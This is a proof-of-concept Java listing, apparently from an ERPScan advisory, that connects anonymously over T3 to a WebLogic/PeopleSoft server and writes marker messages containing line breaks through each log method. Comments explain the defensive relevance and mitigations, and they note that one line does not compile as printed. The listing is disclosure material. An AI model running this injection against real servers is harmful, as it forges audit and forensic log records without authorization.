PoC
/**
 * Proof-of-concept listing for the log-injection issue named in the reference
 * below: opens a JNDI context against a WebLogic server over T3, obtains the
 * {@code weblogic.common.T3Services} object, and submits one message through
 * each of its log methods, every message carrying an embedded line break.
 *
 * <p>The JNDI environment built here has no {@code Context.SECURITY_PRINCIPAL}
 * or {@code Context.SECURITY_CREDENTIALS} entry, so no credentials are supplied
 * by this code. NOTE(review): whether the server accepts the calls and writes
 * the text unmodified is not visible in this listing; it is what the advisory
 * title claims.
 *
 * <p>Why it matters to defenders: a remote caller who can place line breaks in
 * server log text can make one submission read as several separate records,
 * which weakens the log as audit and forensic evidence. Controls to consider:
 * restrict T3/T3S reachability to trusted hosts (network ACLs or WebLogic
 * connection filters), apply the vendor patch for the advisory's issue, and
 * have log writers or collectors escape CR and LF inside message text. Records
 * containing the marker strings used below, or message bodies that start a new
 * line without a normal record prefix, are candidates for detection rules.
 *
 * @param PS_SERVER_IP   host part of the {@code t3://} provider URL
 *                       (presumably the PeopleSoft server address; confirm)
 * @param PS_SERVER_PORT port part of the {@code t3://} provider URL
 * @return always {@code false}; the return value does not report whether the
 *         log calls succeeded
 * @throws NamingException declared, as are the other exception types in the
 *         signature; which call raises which is not shown in this listing
 */
static boolean anon_log_injection(String PS_SERVER_IP,String PS_SERVER_PORT) throws NamingException, JMSException, RemoteException, T3Exception, ServerMigrationException, PersistentStoreException {
// JNDI environment: WebLogic's initial-context factory plus a t3:// provider URL
// built from the two arguments. No principal or credentials are added.
Properties p = new Properties();
p.put(Context.INITIAL_CONTEXT_FACTORY, "weblogic.jndi.WLInitialContextFactory");
// NOTE(review): as printed on the page, the next line is not valid Java, so the
// listing does not compile in this form.
p.put(Context.PROVIDER_URL, "t3://"PS_SERVER_IP+":"+PS_SERVER_PORT);
Context ctx = new InitialContext(p);
// Look the services object up by its JNDI name and narrow it to T3ServicesDef.
Object obj = ctx.lookup("weblogic.common.T3Services");
Object o = PortableRemoteObject.narrow(obj, T3ServicesDef.class);
T3ServicesDef h = (T3ServicesDef) o;
// One call per log method (log, info, error, warning, debug). Each message is
// two numbered marker strings separated by "\n\r" (LF followed by CR), so a
// log writer that does not neutralise line breaks would show the second marker
// on a line of its own. The numbering presumably identifies which method's
// output was split; confirm against the advisory.
h.log().log("ERPScan_1\n\rERPScan_2");
h.log().info("ERPScan_3\n\rERPScan_4");
h.log().error("ERPScan_5\n\rERPScan_6");
h.log().warning("ERPScan_7\n\rERPScan_8");
h.log().debug("ERPScan_9\n\rERPScan_10");
// Fixed result: callers cannot use it to tell success from failure.
return false;
}
[Reference] https://erpscan.com/advisories/erpscan-17-042-anonymous-log-injection-in-fscm/